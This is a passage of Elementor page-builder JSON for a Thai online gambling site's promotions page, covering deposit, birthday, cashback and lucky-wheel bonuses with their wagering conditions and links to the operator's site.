233.42967273878014, 0.5)\"},\"border_radius\":{\"unit\":\"px\",\"top\":\"5\",\"right\":\"5\",\"bottom\":\"5\",\"left\":\"5\",\"isLinked\":true},\"link\":{\"url\":\"luca333line.com\",\"is_external\":\"on\",\"nofollow\":\"\",\"custom_attributes\":\"\"}},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"49fe62a\",\"elType\":\"section\",\"settings\":{\"structure\":\"20\"},\"elements\":[{\"id\":\"fc4dc04\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null,\"background_background\":\"classic\",\"background_color\":\"#2C2A2AAD\",\"border_border\":\"none\",\"border_radius\":{\"unit\":\"px\",\"top\":\"5\",\"right\":\"5\",\"bottom\":\"5\",\"left\":\"5\",\"isLinked\":true},\"margin\":{\"unit\":\"px\",\"top\":\"5\",\"right\":\"5\",\"bottom\":\"5\",\"left\":\"5\",\"isLinked\":true}},\"elements\":[{\"id\":\"b25769f\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/amb18b.com\\/wp-content\\/uploads\\/2026\\/02\\/Bonus-free-100_-Banner-Yok789.webp\",\"id\":279,\"size\":\"\",\"alt\":\"Bonus free 100\",\"source\":\"library\"},\"image_size\":\"full\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"4e0d99f\",\"elType\":\"widget\",\"settings\":{\"title\":\"\\u0e42\\u0e1b\\u0e23\\u0e23\\u0e31\\u0e1a\\u0e42\\u0e21\\u0e1a\\u0e31\\u0e2a 100%\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"20cbe32\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p style=\\\"text-align: center;\\\" data-start=\\\"696\\\" data-end=\\\"740\\\"><strong data-start=\\\"696\\\" data-end=\\\"711\\\">\\u0e04\\u0e38\\u0e49\\u0e21\\u0e2a\\u0e2d\\u0e07\\u0e40\\u0e14\\u0e49\\u0e07<\\/strong> \\u0e40\\u0e15\\u0e34\\u0e21\\u0e40\\u0e17\\u0e48\\u0e32\\u0e44\\u0e23\\u0e23\\u0e31\\u0e1a\\u0e40\\u0e1e\\u0e34\\u0e48\\u0e21\\u0e40\\u0e17\\u0e48\\u0e32\\u0e19\\u0e31\\u0e49\\u0e19<\\/p><ul><li data-start=\\\"696\\\" data-end=\\\"740\\\"><strong data-start=\\\"743\\\" data-end=\\\"758\\\">100 \\u0e23\\u0e31\\u0e1a 200<\\/strong><\\/li><li data-start=\\\"696\\\" data-end=\\\"740\\\"><strong data-start=\\\"763\\\" data-end=\\\"780\\\">500 \\u0e23\\u0e31\\u0e1a 1,000<\\/strong><\\/li><\\/ul><p><span style=\\\"text-decoration: underline;\\\"><strong>\\u0e2a\\u0e23\\u0e38\\u0e1b\\u0e40\\u0e07\\u0e37\\u0e48\\u0e2d\\u0e19\\u0e44\\u0e02<\\/strong><\\/span><\\/p><ul><li data-start=\\\"798\\\" data-end=\\\"837\\\"><strong data-start=\\\"798\\\" data-end=\\\"813\\\">\\u0e17\\u0e33 6 \\u0e40\\u0e17\\u0e34\\u0e23\\u0e4c\\u0e19<\\/strong>, <strong data-start=\\\"815\\\" data-end=\\\"835\\\">\\u0e16\\u0e2d\\u0e19\\u0e2a\\u0e39\\u0e07\\u0e2a\\u0e38\\u0e14 3 \\u0e40\\u0e17\\u0e48\\u0e32<\\/strong><\\/li><li data-start=\\\"798\\\" data-end=\\\"837\\\">\\u0e01\\u0e48\\u0e2d\\u0e19\\u0e16\\u0e2d\\u0e19 <strong data-start=\\\"848\\\" data-end=\\\"886\\\">\\u0e23\\u0e30\\u0e1a\\u0e1a\\u0e15\\u0e31\\u0e14\\u0e40\\u0e04\\u0e23\\u0e14\\u0e34\\u0e15\\u0e42\\u0e1b\\u0e23\\u0e42\\u0e21\\u0e0a\\u0e31\\u0e48\\u0e19 (\\u0e2a\\u0e48\\u0e27\\u0e19\\u0e42\\u0e1a\\u0e19\\u0e31\\u0e2a)<\\/strong> \\u0e2d\\u0e2d\\u0e01\\u0e42\\u0e14\\u0e22\\u0e2d\\u0e31\\u0e15\\u0e42\\u0e19\\u0e21\\u0e31\\u0e15\\u0e34 \\u0e40\\u0e2b\\u0e25\\u0e37\\u0e2d\\u0e22\\u0e2d\\u0e14\\u0e40\\u0e07\\u0e34\\u0e19\\u0e08\\u0e23\\u0e34\\u0e07\\u0e2a\\u0e33\\u0e2b\\u0e23\\u0e31\\u0e1a\\u0e16\\u0e2d\\u0e19<\\/li><li data-start=\\\"798\\\" data-end=\\\"837\\\">\\u0e08\\u0e33\\u0e01\\u0e31\\u0e14\\u0e2a\\u0e34\\u0e17\\u0e18\\u0e34\\u0e4c <strong data-start=\\\"945\\\" data-end=\\\"967\\\">1 \\u0e04\\u0e23\\u0e31\\u0e49\\u0e07\\/\\u0e27\\u0e31\\u0e19\\/\\u0e1c\\u0e39\\u0e49\\u0e43\\u0e0a\\u0e49<\\/strong><\\/li><\\/ul>\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"82869dd\",\"elType\":\"widget\",\"settings\":{\"text\":\"\\u0e23\\u0e31\\u0e1a\\u0e42\\u0e1b\\u0e23\\u0e42\\u0e21\\u0e0a\\u0e31\\u0e48\\u0e19 \\u0e04\\u0e25\\u0e34\\u0e01\\u0e40\\u0e25\\u0e22\",\"selected_icon\":{\"value\":\"fas fa-gift\",\"library\":\"fa-solid\"},\"icon_align\":\"row-reverse\",\"icon_indent\":{\"unit\":\"px\",\"size\":5,\"sizes\":[]},\"align\":\"center\",\"text_shadow_text_shadow_type\":\"yes\",\"text_shadow_text_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":50,\"color\":\"rgba(0,0,0,0.3)\"},\"button_box_shadow_box_shadow_type\":\"yes\",\"button_box_shadow_box_shadow\":{\"horizontal\":2,\"vertical\":2,\"blur\":10,\"spread\":0,\"color\":\"rgba(247.980859375, 233.42967273878014, 233.42967273878014, 0.5)\"},\"border_radius\":{\"unit\":\"px\",\"top\":\"5\",\"right\":\"5\",\"bottom\":\"5\",\"left\":\"5\",\"isLinked\":true},\"link\":{\"url\":\"luca333line.com\",\"is_external\":\"on\",\"nofollow\":\"\",\"custom_attributes\":\"\"}},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"174fb16\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null,\"background_background\":\"classic\",\"background_color\":\"#2C2A2AAD\",\"border_border\":\"none\",\"border_radius\":{\"unit\":\"px\",\"top\":\"5\",\"right\":\"5\",\"bottom\":\"5\",\"left\":\"5\",\"isLinked\":true},\"margin\":{\"unit\":\"px\",\"top\":\"5\",\"right\":\"5\",\"bottom\":\"5\",\"left\":\"5\",\"isLinked\":true}},\"elements\":[{\"id\":\"498b0c4\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/amb18b.com\\/wp-content\\/uploads\\/2026\\/02\\/HBD-Bonus-Banner-Yok789.webp\",\"id\":275,\"size\":\"\",\"alt\":\"HBD Bonus\",\"source\":\"library\"},\"image_size\":\"full\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"ae3dca7\",\"elType\":\"widget\",\"settings\":{\"title\":\"Happy Birthday Bonus \",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"6d7acfa\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p style=\\\"text-align: center;\\\" data-start=\\\"1415\\\" data-end=\\\"1466\\\">\\ud83c\\udf81 \\u0e09\\u0e25\\u0e2d\\u0e07\\u0e40\\u0e14\\u0e37\\u0e2d\\u0e19\\u0e40\\u0e01\\u0e34\\u0e14 \\u0e23\\u0e31\\u0e1a\\u0e02\\u0e2d\\u0e07\\u0e02\\u0e27\\u0e31\\u0e0d\\u0e15\\u0e32\\u0e21\\u0e22\\u0e2d\\u0e14\\u0e1d\\u0e32\\u0e01\\u0e2a\\u0e30\\u0e2a\\u0e21\\u0e20\\u0e32\\u0e22\\u0e43\\u0e19\\u0e40\\u0e14\\u0e37\\u0e2d\\u0e19\\u0e19\\u0e31\\u0e49\\u0e19 <br \\/>(\\u0e23\\u0e31\\u0e1a\\u0e44\\u0e14\\u0e49\\u0e15\\u0e25\\u0e2d\\u0e14\\u0e17\\u0e31\\u0e49\\u0e07\\u0e40\\u0e14\\u0e37\\u0e2d\\u0e19\\u0e40\\u0e01\\u0e34\\u0e14)<\\/p><ul><li data-start=\\\"1469\\\" data-end=\\\"1515\\\">\\u0e22\\u0e2d\\u0e14\\u0e1d\\u0e32\\u0e01\\u0e2a\\u0e30\\u0e2a\\u0e21 <strong data-start=\\\"1480\\\" data-end=\\\"1496\\\">3,000 \\u0e02\\u0e36\\u0e49\\u0e19\\u0e44\\u0e1b<\\/strong> \\u2192 <strong data-start=\\\"1499\\\" data-end=\\\"1513\\\">\\u0e23\\u0e31\\u0e1a\\u0e1f\\u0e23\\u0e35 300<\\/strong><\\/li><li data-start=\\\"1469\\\" data-end=\\\"1515\\\">\\u0e22\\u0e2d\\u0e14\\u0e1d\\u0e32\\u0e01\\u0e2a\\u0e30\\u0e2a\\u0e21 <strong data-start=\\\"1529\\\" data-end=\\\"1542\\\">500\\u20132,999<\\/strong> \\u2192 <strong data-start=\\\"1545\\\" data-end=\\\"1555\\\">\\u0e23\\u0e31\\u0e1a 50<\\/strong><\\/li><li data-start=\\\"1469\\\" data-end=\\\"1515\\\">\\u0e22\\u0e2d\\u0e14\\u0e1d\\u0e32\\u0e01\\u0e2a\\u0e30\\u0e2a\\u0e21 <strong data-start=\\\"1571\\\" data-end=\\\"1586\\\">\\u0e44\\u0e21\\u0e48\\u0e40\\u0e01\\u0e34\\u0e19 500<\\/strong> \\u2192 <strong data-start=\\\"1589\\\" data-end=\\\"1616\\\">\\u0e1d\\u0e32\\u0e01\\u0e40\\u0e17\\u0e48\\u0e32\\u0e44\\u0e23 \\u0e23\\u0e31\\u0e1a\\u0e40\\u0e1e\\u0e34\\u0e48\\u0e21 100%<\\/strong><\\/li><\\/ul><p data-start=\\\"271\\\" data-end=\\\"387\\\"><span style=\\\"text-decoration: underline;\\\"><strong data-start=\\\"371\\\" data-end=\\\"387\\\">\\u0e2a\\u0e23\\u0e38\\u0e1b\\u0e40\\u0e07\\u0e37\\u0e48\\u0e2d\\u0e19\\u0e44\\u0e02<\\/strong><\\/span><\\/p><ul><li data-start=\\\"1634\\\" data-end=\\\"1680\\\"><strong data-start=\\\"1634\\\" data-end=\\\"1653\\\">\\u0e17\\u0e33\\u0e40\\u0e17\\u0e34\\u0e23\\u0e4c\\u0e19 5 \\u0e40\\u0e17\\u0e48\\u0e32<\\/strong>, <strong data-start=\\\"1655\\\" data-end=\\\"1678\\\">\\u0e16\\u0e2d\\u0e19\\u0e44\\u0e14\\u0e49\\u0e2a\\u0e39\\u0e07\\u0e2a\\u0e38\\u0e14 3 \\u0e40\\u0e17\\u0e48\\u0e32<\\/strong><\\/li><li data-start=\\\"1634\\\" data-end=\\\"1680\\\">\\u0e22\\u0e37\\u0e19\\u0e22\\u0e31\\u0e19\\u0e2a\\u0e34\\u0e17\\u0e18\\u0e34\\u0e4c\\u0e42\\u0e14\\u0e22 <strong data-start=\\\"1699\\\" data-end=\\\"1727\\\">\\u0e41\\u0e08\\u0e49\\u0e07\\u0e1a\\u0e31\\u0e15\\u0e23\\u0e1b\\u0e23\\u0e30\\u0e0a\\u0e32\\u0e0a\\u0e19\\u0e01\\u0e31\\u0e1a\\u0e41\\u0e2d\\u0e14\\u0e21\\u0e34\\u0e19<\\/strong><\\/li><\\/ul>\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"e97b605\",\"elType\":\"widget\",\"settings\":{\"text\":\"\\u0e23\\u0e31\\u0e1a\\u0e42\\u0e1b\\u0e23\\u0e42\\u0e21\\u0e0a\\u0e31\\u0e48\\u0e19 \\u0e04\\u0e25\\u0e34\\u0e01\\u0e40\\u0e25\\u0e22\",\"selected_icon\":{\"value\":\"fas fa-gift\",\"library\":\"fa-solid\"},\"icon_align\":\"row-reverse\",\"icon_indent\":{\"unit\":\"px\",\"size\":5,\"sizes\":[]},\"align\":\"center\",\"text_shadow_text_shadow_type\":\"yes\",\"text_shadow_text_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":50,\"color\":\"rgba(0,0,0,0.3)\"},\"button_box_shadow_box_shadow_type\":\"yes\",\"button_box_shadow_box_shadow\":{\"horizontal\":2,\"vertical\":2,\"blur\":10,\"spread\":0,\"color\":\"rgba(247.980859375, 233.42967273878014, 233.42967273878014, 0.5)\"},\"border_radius\":{\"unit\":\"px\",\"top\":\"5\",\"right\":\"5\",\"bottom\":\"5\",\"left\":\"5\",\"isLinked\":true},\"link\":{\"url\":\"luca333line.com\",\"is_external\":\"on\",\"nofollow\":\"\",\"custom_attributes\":\"\"}},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"9947189\",\"elType\":\"section\",\"settings\":{\"structure\":\"20\"},\"elements\":[{\"id\":\"b558a2e\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null,\"background_background\":\"classic\",\"background_color\":\"#2C2A2AAD\",\"border_border\":\"none\",\"border_radius\":{\"unit\":\"px\",\"top\":\"5\",\"right\":\"5\",\"bottom\":\"5\",\"left\":\"5\",\"isLinked\":true},\"margin\":{\"unit\":\"px\",\"top\":\"5\",\"right\":\"5\",\"bottom\":\"5\",\"left\":\"5\",\"isLinked\":true}},\"elements\":[{\"id\":\"0d72c4a\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/amb18b.com\\/wp-content\\/uploads\\/2026\\/02\\/Reward-10_-Banner-Yok789.webp\",\"id\":277,\"size\":\"\",\"alt\":\"Reward 10\",\"source\":\"library\"},\"image_size\":\"full\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"54c71af\",\"elType\":\"widget\",\"settings\":{\"title\":\"\\u0e04\\u0e37\\u0e19\\u0e22\\u0e2d\\u0e14\\u0e40\\u0e2a\\u0e35\\u0e22 10%\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"234d7b8\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p style=\\\"text-align: center;\\\" data-start=\\\"1088\\\" data-end=\\\"1118\\\">\\u0e40\\u0e2a\\u0e35\\u0e22\\u0e44\\u0e21\\u0e48\\u0e40\\u0e2a\\u0e35\\u0e22\\u0e40\\u0e1b\\u0e25\\u0e48\\u0e32! \\u0e23\\u0e30\\u0e1a\\u0e1a <strong data-start=\\\"1844\\\" data-end=\\\"1878\\\">\\u0e41\\u0e1b\\u0e25\\u0e07\\u0e22\\u0e2d\\u0e14\\u0e40\\u0e2a\\u0e35\\u0e22\\u0e40\\u0e1b\\u0e47\\u0e19\\u0e41\\u0e15\\u0e49\\u0e21 Reward 10%<\\/strong> <br \\/>\\u0e19\\u0e33\\u0e41\\u0e15\\u0e49\\u0e21\\u0e44\\u0e1b\\u0e25\\u0e38\\u0e49\\u0e19\\u0e43\\u0e2b\\u0e21\\u0e2b\\u0e23\\u0e37\\u0e2d\\u0e08\\u0e30\\u0e41\\u0e25\\u0e01\\u0e02\\u0e2d\\u0e07\\u0e23\\u0e32\\u0e07\\u0e27\\u0e31\\u0e25\\u0e01\\u0e47\\u0e44\\u0e14\\u0e49 \\u0e43\\u0e19\\u0e2b\\u0e19\\u0e49\\u0e32\\u0e41\\u0e25\\u0e01\\u0e41\\u0e15\\u0e49\\u0e21<\\/p><p><span style=\\\"text-decoration: underline;\\\"><strong>\\u0e2a\\u0e23\\u0e38\\u0e1b\\u0e40\\u0e07\\u0e37\\u0e48\\u0e2d\\u0e19\\u0e44\\u0e02<\\/strong><\\/span><\\/p><ul><li data-start=\\\"1936\\\" data-end=\\\"1990\\\">\\u0e04\\u0e34\\u0e14\\u0e40\\u0e1b\\u0e47\\u0e19\\u0e40\\u0e1b\\u0e2d\\u0e23\\u0e4c\\u0e40\\u0e0b\\u0e47\\u0e19\\u0e15\\u0e4c\\u0e08\\u0e32\\u0e01\\u0e22\\u0e2d\\u0e14\\u0e40\\u0e2a\\u0e35\\u0e22\\u0e2a\\u0e38\\u0e17\\u0e18\\u0e34 \\u0e15\\u0e32\\u0e21\\u0e23\\u0e2d\\u0e1a\\u0e17\\u0e35\\u0e48\\u0e23\\u0e30\\u0e1a\\u0e1a\\u0e01\\u0e33\\u0e2b\\u0e19\\u0e14<\\/li><li data-start=\\\"1936\\\" data-end=\\\"1990\\\">\\u0e41\\u0e15\\u0e49\\u0e21\\u0e44\\u0e21\\u0e48\\u0e43\\u0e0a\\u0e48\\u0e40\\u0e07\\u0e34\\u0e19\\u0e2a\\u0e14\\u0e42\\u0e14\\u0e22\\u0e15\\u0e23\\u0e07 \\u0e15\\u0e49\\u0e2d\\u0e07\\u0e19\\u0e33\\u0e44\\u0e1b\\u0e41\\u0e25\\u0e01\\u0e15\\u0e32\\u0e21\\u0e23\\u0e32\\u0e22\\u0e01\\u0e32\\u0e23\\u0e17\\u0e35\\u0e48\\u0e40\\u0e1b\\u0e34\\u0e14\\u0e43\\u0e2b\\u0e49\\u0e41\\u0e25\\u0e01\\u0e43\\u0e19\\u0e02\\u0e13\\u0e30\\u0e19\\u0e31\\u0e49\\u0e19<\\/li><\\/ul>\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"5ce39e5\",\"elType\":\"widget\",\"settings\":{\"text\":\"\\u0e23\\u0e31\\u0e1a\\u0e42\\u0e1b\\u0e23\\u0e42\\u0e21\\u0e0a\\u0e31\\u0e48\\u0e19 \\u0e04\\u0e25\\u0e34\\u0e01\\u0e40\\u0e25\\u0e22\",\"selected_icon\":{\"value\":\"fas fa-gift\",\"library\":\"fa-solid\"},\"icon_align\":\"row-reverse\",\"icon_indent\":{\"unit\":\"px\",\"size\":5,\"sizes\":[]},\"align\":\"center\",\"text_shadow_text_shadow_type\":\"yes\",\"text_shadow_text_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":50,\"color\":\"rgba(0,0,0,0.3)\"},\"button_box_shadow_box_shadow_type\":\"yes\",\"button_box_shadow_box_shadow\":{\"horizontal\":2,\"vertical\":2,\"blur\":10,\"spread\":0,\"color\":\"rgba(247.980859375, 233.42967273878014, 233.42967273878014, 0.5)\"},\"border_radius\":{\"unit\":\"px\",\"top\":\"5\",\"right\":\"5\",\"bottom\":\"5\",\"left\":\"5\",\"isLinked\":true},\"link\":{\"url\":\"luca333line.com\",\"is_external\":\"on\",\"nofollow\":\"\",\"custom_attributes\":\"\"}},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"21cd1ab\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null,\"background_background\":\"classic\",\"background_color\":\"#2C2A2AAD\",\"border_border\":\"none\",\"border_radius\":{\"unit\":\"px\",\"top\":\"5\",\"right\":\"5\",\"bottom\":\"5\",\"left\":\"5\",\"isLinked\":true},\"margin\":{\"unit\":\"px\",\"top\":\"5\",\"right\":\"5\",\"bottom\":\"5\",\"left\":\"5\",\"isLinked\":true}},\"elements\":[{\"id\":\"879b024\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/amb18b.com\\/wp-content\\/uploads\\/2026\\/02\\/lucky-wheel-Banner-Yok789.webp\",\"id\":276,\"size\":\"\",\"alt\":\"lucky wheel \",\"source\":\"library\"},\"image_size\":\"full\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"6b5fc02\",\"elType\":\"widget\",\"settings\":{\"title\":\"Lucky Wheel \\u0e01\\u0e07\\u0e25\\u0e49\\u0e2d\\u0e40\\u0e2a\\u0e35\\u0e48\\u0e22\\u0e07\\u0e42\\u0e0a\\u0e04 \",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"a328cdd\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p style=\\\"text-align: center;\\\" data-start=\\\"1415\\\" data-end=\\\"1466\\\">\\u0e2b\\u0e21\\u0e38\\u0e19\\u0e25\\u0e38\\u0e49\\u0e19\\u0e23\\u0e32\\u0e07\\u0e27\\u0e31\\u0e25\\u0e17\\u0e38\\u0e01\\u0e27\\u0e31\\u0e19\\u0e14\\u0e49\\u0e27\\u0e22\\u0e41\\u0e15\\u0e49\\u0e21 <strong data-start=\\\"75\\\" data-end=\\\"85\\\">Reward<\\/strong> \\u0e02\\u0e2d\\u0e07\\u0e04\\u0e38\\u0e13 <br \\/>\\u0e40\\u0e1b\\u0e25\\u0e35\\u0e48\\u0e22\\u0e19\\u0e41\\u0e15\\u0e49\\u0e21\\u0e40\\u0e1b\\u0e47\\u0e19\\u0e2a\\u0e34\\u0e17\\u0e18\\u0e34\\u0e4c\\u0e2b\\u0e21\\u0e38\\u0e19 \\u0e41\\u0e25\\u0e49\\u0e27\\u0e23\\u0e31\\u0e1a\\u0e40\\u0e04\\u0e23\\u0e14\\u0e34\\u0e15\\u0e42\\u0e1a\\u0e19\\u0e31\\u0e2a\\u0e17\\u0e31\\u0e19\\u0e17\\u0e35\\u0e2b\\u0e25\\u0e31\\u0e07\\u0e08\\u0e1a\\u0e01\\u0e32\\u0e23\\u0e2b\\u0e21\\u0e38\\u0e19<\\/p><p data-start=\\\"271\\\" data-end=\\\"387\\\"><span style=\\\"text-decoration: underline;\\\"><strong data-start=\\\"371\\\" data-end=\\\"387\\\">\\u0e2a\\u0e23\\u0e38\\u0e1b\\u0e40\\u0e07\\u0e37\\u0e48\\u0e2d\\u0e19\\u0e44\\u0e02<\\/strong><\\/span><\\/p><ul><li data-start=\\\"197\\\" data-end=\\\"252\\\"><strong data-start=\\\"197\\\" data-end=\\\"250\\\">20 \\/ 50 \\/ 100 \\/ 150 \\/ 200 \\/ 250 \\/ 300 \\u0e40\\u0e04\\u0e23\\u0e14\\u0e34\\u0e15\\u0e42\\u0e1a\\u0e19\\u0e31\\u0e2a<\\/strong><\\/li><li data-start=\\\"197\\\" data-end=\\\"252\\\"><strong data-start=\\\"255\\\" data-end=\\\"275\\\">\\ud83c\\udf81 Mystery Prize<\\/strong>\\u00a0\\u0e2a\\u0e38\\u0e48\\u0e21\\u0e23\\u0e32\\u0e07\\u0e27\\u0e31\\u0e25\\u0e1e\\u0e34\\u0e40\\u0e28\\u0e29 (\\u0e40\\u0e0a\\u0e48\\u0e19 500 \\u0e40\\u0e04\\u0e23\\u0e14\\u0e34\\u0e15 <strong data-start=\\\"310\\\" data-end=\\\"318\\\">\\u0e2b\\u0e23\\u0e37\\u0e2d<\\/strong> \\u0e2a\\u0e1b\\u0e34\\u0e19\\u0e40\\u0e1e\\u0e34\\u0e48\\u0e21 +1)<\\/li><\\/ul>\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"5aae432\",\"elType\":\"widget\",\"settings\":{\"text\":\"\\u0e23\\u0e31\\u0e1a\\u0e42\\u0e1b\\u0e23\\u0e42\\u0e21\\u0e0a\\u0e31\\u0e48\\u0e19 \\u0e04\\u0e25\\u0e34\\u0e01\\u0e40\\u0e25\\u0e22\",\"selected_icon\":{\"value\":\"fas fa-gift\",\"library\":\"fa-solid\"},\"icon_align\":\"row-reverse\",\"icon_indent\":{\"unit\":\"px\",\"size\":5,\"sizes\":[]},\"align\":\"center\",\"text_shadow_text_shadow_type\":\"yes\",\"text_shadow_text_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":50,\"color\":\"rgba(0,0,0,0.3)\"},\"button_box_shadow_box_shadow_type\":\"yes\",\"button_box_shadow_box_shadow\":{\"horizontal\":2,\"vertical\":2,\"blur\":10,\"spread\":0,\"color\":\"rgba(247.980859375, 233.42967273878014, 233.42967273878014, 0.5)\"},\"border_radius\":{\"unit\":\"px\",\"top\":\"5\",\"right\":\"5\",\"bottom\":\"5\",\"left\":\"5\",\"isLinked\":true},\"link\":{\"url\":\"luca333line.com\",\"is_external\":\"on\",\"nofollow\":\"\",\"custom_attributes\":\"\"}},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"d6f8124\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"4ce4610\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"9e70ab2\",\"elType\":\"widget\",\"settings\":{\"title\":\"\\u0e27\\u0e34\\u0e18\\u0e35\\u0e01\\u0e32\\u0e23\\u0e23\\u0e31\\u0e1a\\u0e42\\u0e1b\\u0e23\\u0e42\\u0e21\\u0e0a\\u0e31\\u0e48\\u0e19\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"e921159\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<ul><li data-start=\\\"2531\\\" data-end=\\\"2570\\\">\\u0e40\\u0e02\\u0e49\\u0e32\\u0e2a\\u0e39\\u0e48\\u0e23\\u0e30\\u0e1a\\u0e1a \\u2192 \\u0e44\\u0e1b\\u0e17\\u0e35\\u0e48\\u0e40\\u0e21\\u0e19\\u0e39 <strong data-start=\\\"2555\\\" data-end=\\\"2568\\\">\\u0e42\\u0e1b\\u0e23\\u0e42\\u0e21\\u0e0a\\u0e31\\u0e48\\u0e19<\\/strong><\\/li><li data-start=\\\"2574\\\" data-end=\\\"2643\\\">\\u0e40\\u0e25\\u0e37\\u0e2d\\u0e01\\u0e42\\u0e1b\\u0e23\\u0e17\\u0e35\\u0e48\\u0e15\\u0e49\\u0e2d\\u0e07\\u0e01\\u0e32\\u0e23 \\u0e41\\u0e25\\u0e30\\u0e01\\u0e14 <strong data-start=\\\"2599\\\" data-end=\\\"2614\\\">\\u0e01\\u0e14\\u0e23\\u0e31\\u0e1a\\u0e2a\\u0e34\\u0e17\\u0e18\\u0e34\\u0e4c<\\/strong> (\\u0e2b\\u0e23\\u0e37\\u0e2d\\u0e41\\u0e08\\u0e49\\u0e07\\u0e41\\u0e2d\\u0e14\\u0e21\\u0e34\\u0e19\\u0e15\\u0e32\\u0e21\\u0e17\\u0e35\\u0e48\\u0e23\\u0e30\\u0e1a\\u0e38)<\\/li><li data-start=\\\"2647\\\" data-end=\\\"2706\\\">\\u0e23\\u0e30\\u0e1a\\u0e1a\\u0e40\\u0e04\\u0e23\\u0e14\\u0e34\\u0e15\\u0e40\\u0e02\\u0e49\\u0e32 <strong data-start=\\\"2662\\\" data-end=\\\"2675\\\">\\u0e2d\\u0e31\\u0e15\\u0e42\\u0e19\\u0e21\\u0e31\\u0e15\\u0e34<\\/strong> \\/ \\u0e2b\\u0e23\\u0e37\\u0e2d\\u0e2b\\u0e25\\u0e31\\u0e07\\u0e22\\u0e37\\u0e19\\u0e22\\u0e31\\u0e19\\u0e2a\\u0e34\\u0e17\\u0e18\\u0e34\\u0e4c\\u0e2a\\u0e33\\u0e40\\u0e23\\u0e47\\u0e08<\\/li><li data-start=\\\"2710\\\" data-end=\\\"2741\\\">\\u0e15\\u0e23\\u0e27\\u0e08\\u0e2a\\u0e2d\\u0e1a\\u0e2a\\u0e16\\u0e32\\u0e19\\u0e30\\u0e44\\u0e14\\u0e49\\u0e43\\u0e19\\u0e1b\\u0e23\\u0e30\\u0e27\\u0e31\\u0e15\\u0e34\\u0e18\\u0e38\\u0e23\\u0e01\\u0e23\\u0e23\\u0e21<\\/li><\\/ul>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"3257b34\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"076795c\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"87a05f6\",\"elType\":\"widget\",\"settings\":{\"title\":\"\\u0e40\\u0e07\\u0e37\\u0e48\\u0e2d\\u0e19\\u0e44\\u0e02\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"9781422\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<ul><li data-start=\\\"2092\\\" data-end=\\\"2176\\\">\\u0e42\\u0e1b\\u0e23\\u0e17\\u0e31\\u0e49\\u0e07\\u0e2b\\u0e21\\u0e14\\u0e2a\\u0e33\\u0e2b\\u0e23\\u0e31\\u0e1a <strong data-start=\\\"2109\\\" data-end=\\\"2138\\\">1 \\u0e1c\\u0e39\\u0e49\\u0e43\\u0e0a\\u0e49\\/1 \\u0e2d\\u0e38\\u0e1b\\u0e01\\u0e23\\u0e13\\u0e4c\\/1 \\u0e44\\u0e2d\\u0e1e\\u0e35<\\/strong> \\u0e2b\\u0e49\\u0e32\\u0e21\\u0e43\\u0e0a\\u0e49\\u0e2b\\u0e25\\u0e32\\u0e22\\u0e1a\\u0e31\\u0e0d\\u0e0a\\u0e35\\u0e2b\\u0e23\\u0e37\\u0e2d\\u0e17\\u0e38\\u0e08\\u0e23\\u0e34\\u0e15\\u0e17\\u0e38\\u0e01\\u0e23\\u0e39\\u0e1b\\u0e41\\u0e1a\\u0e1a<\\/li><li data-start=\\\"2179\\\" data-end=\\\"2301\\\">\\u0e01\\u0e32\\u0e23\\u0e19\\u0e31\\u0e1a\\u0e40\\u0e17\\u0e34\\u0e23\\u0e4c\\u0e19\\u0e41\\u0e25\\u0e30\\u0e01\\u0e32\\u0e23\\u0e16\\u0e2d\\u0e19 <strong data-start=\\\"2201\\\" 